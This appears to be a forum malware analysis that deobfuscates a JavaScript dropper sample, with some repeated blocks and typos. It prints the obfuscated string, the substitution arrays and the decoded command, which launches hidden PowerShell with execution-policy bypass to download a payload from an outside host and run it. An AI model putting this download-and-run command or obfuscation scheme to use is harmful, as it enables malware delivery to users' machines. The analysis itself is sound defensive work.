- May 14, 2016
- 1,597
update :
Added one new sample:
From https://malwaretips.com/threads/28-11-2016-20.65943/
thanks to @Der.Reisende
7.js
1) Main difference :
SEE THE FIRST POST FOR EXPLANATIONS
Obfuscated Command Line String :
In function olymip()
Array of string with patterns that will be replaced by chars on the obfuscated Command Line String
Array of char that will replace the patterns from izyme on the obfuscated Command Line String
We get :
To find the run part : still the same method
"cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http ://www .aleqopena.top/user.php?f=1.dat','%appdata%\eXe');start-process %appdata%\eXe"
runs powershell.exe :
Payload:
URL :
Added one new sample:
From https://malwaretips.com/threads/28-11-2016-20.65943/
thanks to @Der.Reisende
7.js
1) Main difference :
SEE THE FIRST POST FOR EXPLANATIONS
Obfuscated Command Line String :
In function olymip()
var uwnizjiq = "uznehu,uk,uja,ynuja,ebz,uja,rydwo,tj,yuja,ox,Xyuja,ox,fuja,ydwo,ne,uja,fyuja,ox,liuja,v,uznehu,uk,fuja,ydwo,ne,POhalx,uznehu,yuja,ox,halx,rhalx,boqyuja,ox,,halx,coxj,halx,yuja,ox,halx,LLuja,rydwo,tj,yuja,ox,halx,xhalx,yuja,ox,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,halx,piqyuja,ox,ynuja,ebz,z,yuja,ox,xyuja,ox,uznehu,uk,Usfis,ihalx,oNPhalx,Ohalx,lIuznehu,uk,yfuja,ydwo,ne,halx,bhalx,Yhalx,Phalx,ydwo,halx,boqyuja,ox,,boqyuja,ox,,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,piqyuja,ox,ynuja,ebz,z,halx,nhalx,ohalx,phalx,ROFhalx,ilyuja,ox,halx,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,piqyuja,ox,ynuja,ebz,z,halx,uznehu,halx,Inhalx,ynuja,ebz,Ouznehu,boqyuja,ox,,sfis,halx,yhalx,Lyuja,ox,fuja,ydwo,ne,halx,coxj,ihalx,ynuja,ebz,halx,ynuja,ebz,halx,yuja,ox,nfuja,ydwo,ne,vovtu,Nyuja,ox,uznehu,halx,piqyuja,ox,ynuja,ebz,z,halx,Obhalx,Jyuja,ox,uznehu,uk,sfis,fuja,ydwo,ne,fuja,ydwo,ne,halx,boqyuja,ox,,yboqyuja,ox,,sfis,yuja,ox,halx,uja,uja,rydwo,tj,nhalx,yuja,ox,sfis,halx,uja,rydwo,tj,halx,uznehu,yuja,ox,halx,bhalx,uznehu,uk,halx,lhalx,ihalx,yuja,ox,nsfis,usikm,uja,rydwo,tj,halx,ynuja,ebz,Ouznehu,nhalx,loydwo,ynuja,ebz,halx,Fihalx,Lyuja,ox,vovtu,yvybk,coxj,sfis,sfis,pibydwo,gkyuja,ox,,uja,fyuja,ox,liuja,v,uja,fyuja,ox,liuja,v,uznehu,uznehu,uznehu,uja,rydwo,tj,ydwo,lyuja,ox,qopyuja,ox,nydwo,uja,rydwo,tj,sfis,opuja,fyuja,ox,liuja,v,uboqyuja,ox,,yuja,ox,ruja,rydwo,tj,pcoxj,p?f=1uja,rydwo,tj,ynuja,ebz,ydwo,sfis,yvybk,,yvybk,etal,ydwo,ppynuja,ebz,ydwo,sfis,ydwo,etal,uja,rydwo,tj,yuja,ox,xyuja,ox,yvybk,usikm,ufjovuznehu,u,boqyuja,ox,,sfis,ydwo,Rhalx,sfis,piqyuja,ox,ynuja,ebz,z,pROhalx,uznehu,uk,yuja,ox,boqyuja,ox,,boqyuja,ox,,fuja,ydwo,ne,halx,etal,ydwo,pPynuja,ebz,ydwo,sfis,ydwo,etal,uja,rydwo,tj,yuja,ox,xyuja,ox,"
Array of string with patterns that will be replaced by chars on the obfuscated Command Line String
var urcugeq = ['halx,', 'usikm,', "etal,", "uja,", 'ydwo,', "uznehu,", "coxj,", 'fmane,', 'ynmebz,', "mratj,", "wuk,", 'ymox,', 'ezmehc,', 'vovtu,', 'sfis,', "mfelimv,", "yvybk,", "boqe,", "ibagke,", 'piqedz,', 'ufjovwu,'];
Array of char that will replace the patterns from izyme on the obfuscated Command Line String
var regli = [
["ostirc", "guga", "^"][2],
["aqpidzafw", "teclu", ")"][2],
["oqobq", "fqiwy", '%'][2],
["elesqy", "fjemcatfo", "m"][2],
["qsajcih", "inaxz", 'a'][2],
["tliqywpo", "ulpiqim", "w"][2],
["huhmudf", "pbupmenu", 'h'][2],
["ysyvuc", "jjyve", " "][2],
["umzalo", "arwovz", "d"][2],
["onep", "ehesys", '.'][2],
["vocfe", "dwaczo", "c"][2],
["ovrym", "ksidijt", 'e'][2],
["jvagla", "olugir", "\,"][2],
["edwedsy", "ktopelxu", "("][2],
["orwynixz", "wbati", "t"][2],
["fqome", "wcypub", '/'][2],
["wipuc", "ixij", "'"][2],
["klytdy", "agmosfaxj", "s"][2],
["yxvokkuqs", "ykonipv", ':'][2],
["yxhuz", "esixdarj", "-"][2],
["nuxbu", "ufsyjpi", ';'][2]
];
["ostirc", "guga", "^"][2],
["aqpidzafw", "teclu", ")"][2],
["oqobq", "fqiwy", '%'][2],
["elesqy", "fjemcatfo", "m"][2],
["qsajcih", "inaxz", 'a'][2],
["tliqywpo", "ulpiqim", "w"][2],
["huhmudf", "pbupmenu", 'h'][2],
["ysyvuc", "jjyve", " "][2],
["umzalo", "arwovz", "d"][2],
["onep", "ehesys", '.'][2],
["vocfe", "dwaczo", "c"][2],
["ovrym", "ksidijt", 'e'][2],
["jvagla", "olugir", "\,"][2],
["edwedsy", "ktopelxu", "("][2],
["orwynixz", "wbati", "t"][2],
["fqome", "wcypub", '/'][2],
["wipuc", "ixij", "'"][2],
["klytdy", "agmosfaxj", "s"][2],
["yxvokkuqs", "ykonipv", ':'][2],
["yxhuz", "esixdarj", "-"][2],
["nuxbu", "ufsyjpi", ';'][2]
];
here are the main change from previous sample :
=> each char are on the index 2 !
The script make the same operations to get the deobfuscated command line :var regli= ["^", ")" ,"%" , "m" , "a" , "w" , "h" ," " , "d", ".", "c" , "e" , "," , "(" , "t" ,"/" ,"'" ,"s" , ":" ,"-" , ";"]
We get :
"cmd.eXe /c PO^we^r^s^h^e^LL.e^x^e ^-execUti^oNP^O^lIcy ^b^Y^P^a^ss -^n^o^p^ROF^ile^ -^w^In^dOwst^y^Le ^hi^d^d^en (New^-^Ob^Ject ^syste^m.n^et^.^we^b^c^l^i^ent).^dOwn^load^Fi^Le('http ://www .aleqopena.top/user.php?f=1.dat','%appdata%\exe');staR^t-pRO^cess ^%apPdata%\exe"
That means :
"cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://www.aleqopena.top/user.php?f=1.dat','%appdata%\eXe');start-process %appdata%\eXe"
To find the run part : still the same method
- The command line deofuscation is made by the function olymip()
=> a search with notepad gives :
var ohduxa = olymip();
=> a search on ohduxa gives :
case 66:
oxoqmekq["ru" + "n"](ohduxa, elykfej);
break;
oxoqmekq["ru" + "n"](ohduxa, elykfej);
break;
=> oxoqmekq["r" + "un"](ohduxa, elykfej);
var elykfej = 0;
ohduxa : commande line
=> oxoqmekq["run"](comnandLine, 0)ohduxa : commande line
=> shell.run(comnandLine, 0)
"cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http ://www .aleqopena.top/user.php?f=1.dat','%appdata%\eXe');start-process %appdata%\eXe"
runs powershell.exe :
-execuyionpolivy bypass
=> allows to bypass the execution policy
=> hide the powershell window
=> creates an .NET object and use its downloadfile method to downlad the payload and save it on HD
=> %appdata%\eXe
=> Example : C:\Users\DardiM\AppData\Roaming\eXe
=> allows to bypass the execution policy
-noprofile
=> to launch the script with in an untouched environment (it ddoesn't load the Windows Powershell profile)
-windowstyle hidden=> hide the powershell window
(new-object system.net.webclient).downloadfile('http ://www .brownalet.top/id.php?f=1.dat' ,'%appdata%\eXe');=> creates an .NET object and use its downloadfile method to downlad the payload and save it on HD
=> %appdata%\eXe
=> Example : C:\Users\DardiM\AppData\Roaming\eXe
start-process %appdata%\eXe"
=> run the payloadPayload:
C:\Users\DardiM\AppData\Roaming\eXe
URL :
http ://www .aleqopena.top/user.php?f=1.dat
Last edited:
